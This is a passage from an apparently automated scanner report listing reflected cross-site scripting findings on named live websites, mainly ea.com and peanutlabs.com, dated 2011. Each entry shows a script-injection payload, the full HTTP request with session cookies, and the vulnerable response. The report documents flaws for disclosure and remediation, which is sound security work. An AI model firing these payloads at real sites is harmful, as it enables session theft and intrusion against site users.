Set-Cookie: BBC-UID=b47de209f1919a47a83bc589419fcac7b7ff0f073010c12f22f926c59ac488a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Mon, 09-Jan-12 01:38:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1294537127000,
       editionToServe: 'us',
       queryString: 'b916d'-alert(1)-'0e4cca645e6=1',
       referrer: null,
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12126880',
       assetType: 'story',
...[SNIP]...

3.559. http://www.cmsinter.net/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cmsinter.net
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d83a2"><script>alert(1)</script>6e563bfa6d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?page_id=68&d83a2"><script>alert(1)</script>6e563bfa6d3=1 HTTP/1.1
Host: www.cmsinter.net
Proxy-Connection: keep-alive
Referer: http://www.cmsinter.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.1.10.1294526267

Response

HTTP/1.1 200 OK
Date: Sat, 08 Jan 2011 22:46:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.cmsinter.net/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 15714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:/
...[SNIP]...
<form action="/?page_id=68&d83a2"><script>alert(1)</script>6e563bfa6d3=1#wpcf7-f9-p68-o1" method="post" class="wpcf7-form">
...[SNIP]...

3.560. http://www.e00.peanutlabs.com/js/iFrame/sc.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/js/iFrame/sc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26db1'%3balert(1)//c84884515e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26db1';alert(1)//c84884515e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/iFrame/sc.php?userId=998826224-3432-8939b9/26db1'%3balert(1)//c84884515e981e2 HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.e00.peanutlabs.com/js/iFrame/index.php?userId=998826224-3432-8939b981e2
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; __utmc=160559081; __utmb=160559081.1.10.1294536631

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:31:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 583

<html>

   <head>
       <script type="text/javascript" src="http://static.e00.peanutlabs.com/js/pl-jquery-1.3.2.min.js"></script>
       <script type="text/javascript" src="http://static.e00.peanutlabs.com/js/co
...[SNIP]...
<script type="text/javascript">
           userId = '998826224-3432-8939b9/26db1';alert(1)//c84884515e981e2';
       </script>
...[SNIP]...

3.561. http://www.e00.peanutlabs.com/js/iFrame/sc.php [userId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/js/iFrame/sc.php

Issue detail

The value of the userId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bf13'%3balert(1)//5aebc85affc was submitted in the userId parameter. This input was echoed as 6bf13';alert(1)//5aebc85affc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/iFrame/sc.php?userId=998826224-3432-8939b981e26bf13'%3balert(1)//5aebc85affc HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.e00.peanutlabs.com/js/iFrame/index.php?userId=998826224-3432-8939b981e2
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; __utmc=160559081; __utmb=160559081.1.10.1294536631

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:30:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 582

<html>

   <head>
       <script type="text/javascript" src="http://static.e00.peanutlabs.com/js/pl-jquery-1.3.2.min.js"></script>
       <script type="text/javascript" src="http://static.e00.peanutlabs.com/js/co
...[SNIP]...
<script type="text/javascript">
           userId = '998826224-3432-8939b981e26bf13';alert(1)//5aebc85affc';
       </script>
...[SNIP]...

3.562. http://www.ea.com/hasbro [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/hasbro

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63934"><script>alert(1)</script>2df1751bdc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hasbro63934"><script>alert(1)</script>2df1751bdc4 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:34 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=q1hu6pdtvde5o6ou1i8lmndgr0; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/hasbro63934"><script>alert(1)</script>2df1751bdc4" />
...[SNIP]...

3.563. http://www.ea.com/hasbro [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/hasbro

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ee5"><script>alert(1)</script>fce1739ef22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hasbro?50ee5"><script>alert(1)</script>fce1739ef22=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:52 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=0l3r07fnbqfh2m49pvb96ndld3; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 70735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a href="http://www.digg.com/submit?url=http://www.ea.com/hasbro?50ee5"><script>alert(1)</script>fce1739ef22=1" class="digg-button">
...[SNIP]...

3.564. http://www.ea.com/ipad [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/ipad

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6984"><script>alert(1)</script>80d93bc71a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipade6984"><script>alert(1)</script>80d93bc71a5 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:19 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=q40if3obhassdl2f9hct64jt97; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/ipade6984"><script>alert(1)</script>80d93bc71a5" />
...[SNIP]...

3.565. http://www.ea.com/ipad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/ipad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a8a8"><script>alert(1)</script>a817042de2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipad?7a8a8"><script>alert(1)</script>a817042de2e=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:08:04 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=0pkopsdhd3jhhkf5h4g2ag3fp6; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a href="http://www.digg.com/submit?url=http://www.ea.com/ipad?7a8a8"><script>alert(1)</script>a817042de2e=1" class="digg-button">
...[SNIP]...

3.566. http://www.ea.com/iphone [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/iphone

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30d8"><script>alert(1)</script>b00c128a7a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iphonef30d8"><script>alert(1)</script>b00c128a7a2 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:29 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=2rji8o0i02qi8pf8eecrn0ktl2; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/iphonef30d8"><script>alert(1)</script>b00c128a7a2" />
...[SNIP]...

3.567. http://www.ea.com/iphone [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/iphone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5498"><script>alert(1)</script>98182c329e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iphone?e5498"><script>alert(1)</script>98182c329e3=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:08:04 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=c37dgtcd9v5so5qc2512oda4c2; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a href="http://www.digg.com/submit?url=http://www.ea.com/iphone?e5498"><script>alert(1)</script>98182c329e3=1" class="digg-button">
...[SNIP]...

3.568. http://www.ea.com/mobile [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/mobile

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d069"><script>alert(1)</script>bc71c2e28ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile2d069"><script>alert(1)</script>bc71c2e28ae HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:48 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=5rkhii3l0etm09hgkiup7chbu6; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/mobile2d069"><script>alert(1)</script>bc71c2e28ae" />
...[SNIP]...

3.569. http://www.ea.com/mobile [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b7f0"><script>alert(1)</script>1a57fea79e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile?4b7f0"><script>alert(1)</script>1a57fea79e6=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:08:11 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=f6h8smbmcc5eb4cfmc8shpdpp2; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a href="http://www.digg.com/submit?url=http://www.ea.com/mobile?4b7f0"><script>alert(1)</script>1a57fea79e6=1" class="digg-button">
...[SNIP]...

3.570. http://www.ea.com/platform/online-games [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/online-games

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a510c"><script>alert(1)</script>768026e5947 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platforma510c"><script>alert(1)</script>768026e5947/online-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:15 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=r5uc24ode1odj7sfplf1so9lt6; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/platforma510c"><script>alert(1)</script>768026e5947/online-games" />
...[SNIP]...

3.571. http://www.ea.com/platform/online-games [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/online-games

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71d6"><script>alert(1)</script>afd7f39634c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform/online-gamesc71d6"><script>alert(1)</script>afd7f39634c HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:19 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=hdhctndthgvreqj5oc72kovrd4; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/platform/online-gamesc71d6"><script>alert(1)</script>afd7f39634c" />
...[SNIP]...

3.572. http://www.ea.com/platform/online-games [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/online-games

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e979"><script>alert(1)</script>2cc600f9716 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform/online-games?4e979"><script>alert(1)</script>2cc600f9716=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:54 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=3v32m4m525g1q6qqhm6uoqlng1; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/online-games?4e979"><script>alert(1)</script>2cc600f9716=1">
...[SNIP]...

3.573. http://www.ea.com/platform/pc-games [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/pc-games

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7daef"><script>alert(1)</script>8f7305031c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform7daef"><script>alert(1)</script>8f7305031c5/pc-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:08 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=dp5er2bnu8nk51e2hejgg8prt2; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/platform7daef"><script>alert(1)</script>8f7305031c5/pc-games" />
...[SNIP]...

3.574. http://www.ea.com/platform/pc-games [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/pc-games

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978f0"><script>alert(1)</script>de071991f69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform/pc-games978f0"><script>alert(1)</script>de071991f69 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:12 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=p115287m0igh5ha8rktkogt2l1; path=/
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/platform/pc-games978f0"><script>alert(1)</script>de071991f69" />
...[SNIP]...

3.575. http://www.ea.com/platform/pc-games [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/pc-games

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a13f"><script>alert(1)</script>4e0080deced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platform/pc-games?2a13f"><script>alert(1)</script>4e0080deced=1 HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:38 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=i1srfdvvnrvksap1l2p9ivs9v3; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 84547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/pc-games?2a13f"><script>alert(1)</script>4e0080deced=1">
...[SNIP]...

3.576. http://www.ea.com/platform/ps3-games [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/ps3-games

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1666"><script>alert(1)</script>0c0acabc5be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /platformd1666"><script>alert(1)</script>0c0acabc5be/ps3-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:08:22 GMT
